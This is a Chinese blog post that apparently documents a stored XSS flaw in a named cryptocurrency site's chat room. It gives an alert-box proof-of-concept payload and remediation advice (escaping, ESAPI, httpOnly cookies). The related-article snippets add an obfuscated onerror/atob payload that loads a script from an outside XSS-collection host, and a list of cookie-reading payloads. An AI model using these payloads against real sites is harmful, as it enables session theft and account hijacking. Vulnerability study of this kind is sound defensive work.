【漏洞学习】DVP-2018-01393(聊天室XSS漏洞)

最新推荐文章于 2022-04-12 11:30:12 发布
最新推荐文章于 2022-04-12 11:30:12 发布
阅读量359 收藏
点赞数
分类专栏: 【渗透测试实战】 # DVP漏洞案例学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/86502396
版权

漏洞URL:http://new.funcoin.co/

测试账号:1***************m

密码:t********6

漏洞说明:

登陆测试账号后,点击聊天室:

在聊天室中输入xss payload

刷新一下页面后,移动鼠标到M弹出

漏洞证明:

漏洞利用代码:

 <a onmouseover=alert(7)>M

修复方案:

1:引入全局过滤器对所有的输入内容进行过滤,对页面out.println输出的内容进行htmlencoding编码处理。对变量中包括的“>”、“<”“'”、“=”、“#”、“)”、“(”和“"”字符进行HTML转义,转码如下: & –>    &amp;
< –>    &lt;
>    –>    &gt;
“     –>    &quot;
‘     –>    &#x27;
/     –>    &#x2F;
# –> &#35;
(     –>    &#40;
)     –>     &#41;
2:引入第三方安全控制组件:ESAPI,使用输出编码对所有的输出内容进行编码。考虑到以下场景:
当输出内容位于html标签时:
使用ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) );对输入内容进行转码。
当输出内容位于<script></script>之间时:
使用javascript中的encode函数对输出进行编码。
项目官网:https://www.owasp.org/index.php/ESAPI#tab=Downloads
项目java版github地址:https://github.com/ESAPI/esapi-java
3:在不影响应用的前提下,建议将cookie标记为httpOnly,同时禁用TRACE方法。
FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
江湖聊天源码
05-05
是一个不错的ASP源代码聊天,大家看下乍样
漏洞学习DVP-2018-01681 (聊天XSS)
Fly_鹏程万里
01-16 164
漏洞URL:https://dew.one/chat/room 简要描述: 漏洞证明 漏洞利用代码: &lt;img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwczovL3hzc3B0LmNvbS95V0c4M...
新浪UC聊天的几个漏洞
weixin_33985679的博客
03-23 272
以下消息来自幻影论坛[Ph4nt0m]邮件组。 献给大家一个SINA的UC漏洞。 详细内容见下面连接: [url]http://www.netcicala.com/article/sort014/sort035/info-151.html[/url] 新浪UC是国内较早投入研发的即时通讯软件。新浪UC一直秉承创新的理念,不断推陈出新。新浪UC集传统即时通信软件...
聊天的原代码(ASP.NET有漏洞!)
神殇的专栏
07-06 1333
登陆页面:LOGIN.ASPX function setfocus(element) {element.focus()} --> 请输入登陆名: 请输入登陆密码: 获取信息页面:VERIFY.ASPX  if request.form("txtname")="" or request.form("password")="" then resp
XSS专题
ZY95001的博客
09-11 1018
一、介绍 XSS(Cross-site Scripting,跨站脚本攻击),Owasp Top 10 2017中排名第7。主要基于JS完成恶意攻击行为。 原因:通过将精心构造的代码注入网页中,并由浏览器运行这段代码,达到攻击效果。XSS攻击的对象是用户和用户的浏览器(前端攻击)。 主要原因是没有对攻击者的输入进行严格的过滤,微博、留言板、聊天等收集用户信息的地方都有可能被注入XSS代码。该漏洞存在于服务器中,但是执行环境在客户端浏览器,属于被动攻击。 主要危害:盗取用户账号;窃取cookie..
dvp-pm_1023_dvp-pm_1023_
09-29
This program of dvp-pm_1023//
DVP-PLC-特殊功能模块技术手册
03-15
介绍了关于DVP-PLC-特殊功能模块技术手册的详细说明,提供台达PLC的技术资料的下载。
DVP-EH-数字量模块
03-15
介绍了关于DVP-EH-数字量模块的详细说明,提供台达PLC的技术资料的下载。
台达PLC_DVP-ES2系列选型手册.pdf
12-25
台达PLC_DVP-ES2系列选型手册
DVP-PLC编程技巧大全101例
03-15
介绍了关于DVP-PLC编程技巧大全101例的详细说明,提供台达PLC的技术资料的下载。
XSS简介
xiaoWhite_meng的博客
04-29 1047
XSS跨站脚本攻击Cross Site Script(ing)    CSS (层叠样式表)      XSS 所使用的攻击代码主要JavaScript    JS能够做到的事情,就是可能受到的攻击。    XSS攻击的是用户、浏览器、客户端    一、XSS   简介       只要没有对用户的输入进行严格过滤,就会被XSS   (如:留言板..聊天)二、XSS漏洞危害        盗取各...
漏洞挖掘丨客户支持聊天系统中的IDOR漏洞
weixin_43006749的博客
08-29 395
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 2019-04-17_165229.jpg大家好,今天分享的writeup是一个关于客户支持系统(Customer Support)的IDOR漏洞(不安全的直接对象引用),该漏洞可以导致目标系统的访问控制功能失效,实现客户支持平台内的任意消息读取和发送,还能下载任意用户的相关文件。...
XSS总结
weixin_51356351的博客
11-19 1498
xss理解 1、简介 xss(cross site script)跨站脚本攻击,为了避免与css混淆,所以简称为xss。 2、什么是xss xss全称叫跨站脚本攻击,因为应用使用了js框架,因为应用未做任何防御措施,导致了攻击者使用对应的payload进行攻击,受害者运行了攻击者的payload,将攻击者所需的cookie发送给了攻击者,最本质的是服务器并没有完全过滤客户端提交的数据 3、xss的危害大吗? 答:很大,是现在web中主流的攻击方式。 4、xss攻击都可以导致哪些危害 (1)钓鱼欺骗 (2)网
XSS攻击介绍(一)】
热门推荐
qq_55213436的博客
04-12 2万+
一、前言 XSS:跨站脚本攻击,即CSS。利用网页开发时留下的漏洞(web应用程序对用户的输入过滤不足),巧妙的将恶意的代码注入到网页中,使用户浏览器加载并执行恶意制造的代码,以达到攻击的效果。这恶意的代码通常是JS代码,但实际上也可以是JAVA、VBS、ActiveX、Flash或者是普通的HTML。(浏览器不会判断,只要是符合解析,那么就会执行恶意的代码)。可能存在XSS的地方:微博、留言板、聊天等收集用户输入的地方都可能遭受XSS攻击的风险。只要你对用户的输入没有严格过滤。 ...
Javascript 输入框 xss注入 以及防范
Johnny Liao的博客
12-02 8954
注入 类似于sql注入,在输入内容上动手脚,然后造成标签闭合的现象,再写入恶意 的js; 例如: &lt;input type="text" value="$var"&gt; 输入的内容如果是 " onclick = "javascript_function()" &gt; 在遇到有字符限制的情况下,可以将两个input之间的内容注释掉, 再在之间构建恶意的js &lt;in...
XSS的构造与变形
奇怪的569的博客
10-14 1224
XSSXSS 是OWASP TOP10之一的漏洞,被称为跨站脚本攻击,是发生在服务器的漏洞, 常出现于微博、留言板、聊天等手机用户输入的地方,都有可能被注入XSS代码。 ※XSS的构造(现在有三种方法) 1.利用<>构造HTML/JS 在测试页面,提交参数<script>alert(xss)</script> 2.伪协议 使用JavaScr...
五种xss弹窗方式
火柴人的博客
07-20 1万+
1.alert() alert(‘xss’) alert(“xss”) alert(/xss/) alert(document.cookie) 2.confirm() confirm(‘xss’) confirm(“xss”) confirm(/xss/) confirm(document.cookie) 3.prompt() prompt(‘xss’) prompt(...
XSS大全
weixin_46601374的博客
03-01 8117
XSS的原理和特性 xss:将用户的输入当作前端代码执行 注入攻击的本质,是把用户输入的数据当做代码执行。 这里有两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据 html:定义了网页的结构 css:美化页面 js:可以操浏览器 XSS主要拼接的是什么 SQL注入拼接的是操作数据库的SQL语句。 XSS拼接的是网页的HTML代码,一般而言我们是可以拼接出合适的HTML代码去执行恶意的JS语句(总结:xss就是拼接恶意的HTML) xss
台达dvp-plc编程技巧pdf
最新发布
08-02
台达DVP-PLC编程技巧PDF是关于台达PLC编程技巧的书籍或文档的PDF版本。PLC(可编程逻辑控制器)是一种用于自动化控制的电子设备,而台达DVP-PLC是台达电子公司生产的一种PLC产品。 这本编程技巧PDF主要提供了关于台达DVP-PLC编程的实用技巧和指导。它可能涵盖以下内容: 1. DVP-PLC的基础知识:介绍PLC的工作原理、结构组成和基本功能等。 2. 编程环境:讲解如何设置和配置DVP-PLC的编程软件环境,包括安装和运行PLC编程软件。 3. 编程语言:介绍DVP-PLC所使用的编程语言,可能是Ladder Diagram(梯形图)、Instruction List(指令表)、Structured Text(结构化文本)等。 4. 编程技巧和实例:提供一些常见的编程技巧和实例,帮助读者更好地理解如何使用DVP-PLC进行各种控制和自动化任务。 5. 故障排除和调试:介绍常见的故障排除和调试方法,帮助读者解决PLC程序中可能出现的问题。 通过阅读这本编程技巧PDF,读者可以提高对于台达DVP-PLC编程的理解和掌握,从而更好地应用于各种工业和自动化控制领域。无论是初学者还是有经验的工程师都能从中获得帮助和启发。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值